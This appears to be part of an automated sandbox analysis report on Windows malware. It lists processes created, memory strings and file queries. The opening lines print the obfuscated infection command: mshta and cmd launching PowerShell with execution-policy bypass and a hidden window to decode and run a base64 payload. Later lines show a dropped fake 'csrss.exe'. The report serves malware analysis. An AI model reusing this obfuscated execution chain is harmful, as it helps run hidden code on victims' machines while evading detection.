                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pifJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: XProgram Manager
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000000.1473759100.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3627485503.00000000012C0000.00000002.00000001.00040000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3627349118.0000000001510000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 12_2_03805694
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: GetLocaleInfoA, 12_2_0380A28C
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: GetLocaleInfoA, 12_2_0380A2D8
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 12_2_038057A0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03808D0C GetLocalTime,12_2_03808D0C
